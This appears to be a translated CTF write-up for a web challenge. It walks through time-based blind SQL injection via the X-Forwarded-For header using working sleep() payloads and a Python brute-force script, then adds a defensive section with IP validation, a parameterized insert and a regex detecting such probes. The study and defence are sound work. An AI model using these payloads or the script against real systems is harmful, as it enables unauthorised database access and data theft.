  • who are you?----Writeup

    Original challenge: http://ctf5.shiyanbar.com/web/wonderkun/index.php

    The page records your IP address.

    That immediately suggests the X-Forwarded-For header is the input being used.

    And since the challenge hints that the value is written into a DB,

    the natural guess is SQL injection through that header.

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when (length(database())=4) then sleep(2) else sleep(0) end))lzRG) and '1'='1

    The request delays, so the database name is 4 characters long.

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when (database() like 'web1') then sleep(2) else sleep(0) end))lzRG) and '1'='1
    This confirms the database name is web1.

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(*) from flag)>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
    This confirms the table name (flag).

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag)>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
    This confirms the column name (flag).

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag)>1) then sleep(2) else sleep(0) end))lzRG) and '1'='1
    No delay here, so the table holds only one row.

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select length(flag) from flag )=32) then sleep(2) else sleep(0) end))lzRG) and '1'='1
    This gives the length of the flag (32).

    X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag where flag like "%")>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
    From here a script brute-forces the flag one character at a time with LIKE prefixes.

    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-

    import requests
    import time

    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'    # MySQL LIKE is case-insensitive, so lowercase is enough

    flag = ""
    print('Start to retrieve flag:')
    for i in range(32):                      # flag length was established as 32 above
        for payload in payloads:
            starttime = time.time()
            url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

            headers = { "Host": "ctf5.shiyanbar.com",
                "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
                "Accept-Encoding": "gzip, deflate",
                "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour",
                "Connection": "keep-alive",
                "X-FORWARDED-FOR": "127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag where flag like '"+flag+payload+"%')>0) then sleep(5) else sleep(0) end))lzRG) and '1'='1"
                }

            res = requests.get(url, headers=headers)
            if time.time() - starttime > 5:
                # Re-send once to rule out a slow network response being mistaken for sleep(5)
                starttime2 = time.time()
                res = requests.get(url, headers=headers)
                if time.time() - starttime2 > 5:
                    flag += payload
                    print('\nflag so far:', flag, end=' ')
                    break
            else:
                print('.', end='')
    print('\n[Done] flag is %s' % flag)

    Finally we obtain the flag.
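    The root cause above is that an attacker-controlled header is concatenated into the INSERT that logs the visitor's IP. The following is an added example (not code from the writeup or from the challenge) showing the defender's side: validate X-Forwarded-For as an IP literal before storing it, bind it as a query parameter, and flag the sleep()/CASE WHEN shape used in this writeup during log review. It uses sqlite3 as a stand-in for the MySQL backend and constructed sample header values.

```python
import ipaddress
import re
import sqlite3

# Constructed sample X-Forwarded-For values: two legitimate hops and one
# shaped like the time-based probes in this writeup (test data only).
SAMPLE_XFF = [
    "203.0.113.7",
    "203.0.113.7, 198.51.100.2",
    "127.0.0.1' and (SELECT * FROM (SELECT(case when (length(database())=4) "
    "then sleep(2) else sleep(0) end))lzRG) and '1'='1",
]

def client_ip(xff_value):
    """Return the first X-Forwarded-For hop if it parses as an IP, else None.
    Rejecting anything that is not an IP literal removes the injection
    surface regardless of how the value is later stored."""
    first = xff_value.split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(first))
    except ValueError:
        return None

# Heuristic for WAF rules or log review: the delay-based shapes used above.
TIME_BLIND = re.compile(r"(?i)\bsleep\s*\(|\bbenchmark\s*\(|\bcase\s+when\b")

def looks_like_time_blind_probe(xff_value):
    """True when the header carries a sleep()/benchmark()/CASE WHEN probe.
    False positives are possible; tune the pattern to your own traffic."""
    return TIME_BLIND.search(xff_value) is not None

def record_visit(conn, xff_value):
    """Hardened logging: validate as IP, then insert with a bound parameter
    instead of string concatenation. Returns the stored IP or None."""
    ip = client_ip(xff_value)
    if ip is None:
        return None
    conn.execute("INSERT INTO visitors (ip) VALUES (?)", (ip,))
    return ip

def run_demo():
    """Run the samples through validation, detection and hardened storage."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visitors (ip TEXT)")
    stored = [record_visit(conn, v) for v in SAMPLE_XFF]
    flagged = [looks_like_time_blind_probe(v) for v in SAMPLE_XFF]
    rows = conn.execute("SELECT ip FROM visitors").fetchall()
    return stored, flagged, rows
```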

    Original article: https://www.cnblogs.com/wh4am1/p/7229121.html